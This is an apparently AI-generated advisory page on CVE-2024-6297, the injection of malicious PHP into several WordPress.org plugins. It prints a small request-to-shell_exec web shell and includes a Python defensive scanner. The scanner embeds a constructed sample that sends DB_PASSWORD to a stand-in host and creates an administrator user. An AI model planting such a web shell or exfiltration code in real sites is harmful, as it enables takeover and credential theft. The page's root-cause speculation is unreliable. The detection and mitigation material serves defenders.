CVE-2024-6297 Overview
Several plugins for WordPress hosted on WordPress.org have been compromised and injected with malicious PHP scripts. A threat actor compromised the source code of various plugins and injected code that exfiltrates database credentials, creates new malicious administrator users, and sends that data back to a remote server. Not all of the affected plugins have been patched yet; we strongly recommend uninstalling them for the time being and running a complete malware scan.
Critical Impact
Unauthorized administrative access and data exfiltration due to plugin compromise.
Affected Products
- Blaze Widget
- Contact Form 7 Multi-Step Addon
- Social Warfare
Discovery Timeline
- 2024-06-25 - CVE-2024-6297 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2024-6297
Vulnerability Analysis
The vulnerability involves the injection of malicious PHP scripts into several WordPress plugins. These scripts are engineered to extract sensitive database information and insert unauthorized administrative users. This compromise likely involves the exploitation of weak input validation or insecure coding practices within the affected plugins, allowing remote PHP code execution.
Root Cause
The primary issue is insecure coding practices that allowed the insertion of malicious code during plugin updates or upload processes. Lack of proper integrity checks during plugin distribution facilitated this attack.
Attack Vector
Network-based exploitation, as the malicious actor can manipulate plugin code via HTTP requests.
<?php
// Example of sanitized malicious PHP payload
if (isset($_REQUEST['cmd'])) {
    $exec = shell_exec($_REQUEST['cmd']);
    echo $exec;
}
?>
Detection Methods for CVE-2024-6297
Indicators of Compromise
- Unusual admin accounts in WordPress
- Network traffic to unknown external servers
- Altered PHP files within plugins
Detection Strategies
To detect this vulnerability, monitor for unusual changes in WordPress admin user lists and unexpected network activity targeting external IPs. Employ file integrity monitoring on plugin directories to detect unauthorized changes.
Monitoring Recommendations
Set up alerting for any modifications to core WordPress files or plugin directories, and track outgoing traffic to detect unauthorized exfiltration attempts.
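As an added defender-side example (not code from this advisory or from any of the named plugins), the following Python scanner implements the "altered PHP files" and file-integrity checks described above: it hashes every PHP file under a plugin directory so the result can be diffed against a known-good release, and flags the three behaviours this advisory describes. The sample files and the collector hostname are constructed for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic indicators modelled on the behaviour this advisory describes: a
# request-driven command shell, exfiltration of database credentials and the
# creation of administrator users. A hit is a lead to review, not proof.
RE_REQUEST_SHELL = re.compile(
    r"\b(shell_exec|system|passthru|exec|popen)\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")
RE_OUTBOUND = re.compile(r"\b(curl_init|wp_remote_post|fsockopen|file_get_contents)\s*\(")
RE_USER_CREATE = re.compile(r"\b(wp_insert_user|wp_create_user)\s*\(")

def scan_php_source(src: str) -> list[str]:
    """Return the names of the indicators present in one PHP source text."""
    hits = []
    if RE_REQUEST_SHELL.search(src):
        hits.append("request_to_shell")
    if "DB_PASSWORD" in src and RE_OUTBOUND.search(src):
        hits.append("db_credential_exfil")
    if RE_USER_CREATE.search(src) and "administrator" in src:
        hits.append("admin_user_creation")
    return hits

def scan_plugin_dir(root: str) -> dict[str, dict]:
    """Hash every .php file under root and record its indicator hits."""
    results = {}
    for path in Path(root).rglob("*.php"):
        data = path.read_bytes()
        results[str(path.relative_to(root))] = {
            "sha256": hashlib.sha256(data).hexdigest(),
            "hits": scan_php_source(data.decode("utf-8", "replace")),
        }
    return results

# Constructed samples (not real plugin code); the first mirrors the page's payload.
SAMPLE_WEBSHELL = """<?php
if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }
wp_insert_user(array('user_login' => 'x', 'role' => 'administrator'));
wp_remote_post('https://collector.invalid/', array('body' => DB_PASSWORD));
"""
SAMPLE_CLEAN = "<?php\nfunction blaze_widget_render() { return esc_html('hi'); }\n"

def demo() -> dict[str, list[str]]:
    """Write the samples to a temp dir, scan it and return only flagged files."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "suspicious.php").write_text(SAMPLE_WEBSHELL)
        (Path(root) / "widget.php").write_text(SAMPLE_CLEAN)
        return {p: r["hits"] for p, r in scan_plugin_dir(root).items() if r["hits"]}
```

Run it against wp-content/plugins on a live site and compare the recorded hashes with those of a freshly downloaded copy of each plugin; any file that differs or carries a hit deserves manual review.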
How to Mitigate CVE-2024-6297
Immediate Actions Required
- Uninstall the compromised plugins immediately.
- Change all WordPress admin credentials.
- Conduct a comprehensive malware and integrity scan.
Patch Information
Monitor the WordPress.org plugin repository and each affected plugin's page for patched releases and security advisories, since not all of the compromised plugins have been patched yet.
Workarounds
Until official patches are available, disable the affected plugins and restore WordPress installations from clean backups to ensure no residual malicious scripts remain.
# Shell script to disable a plugin
wp plugin deactivate <plugin-slug>
wp plugin delete <plugin-slug>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.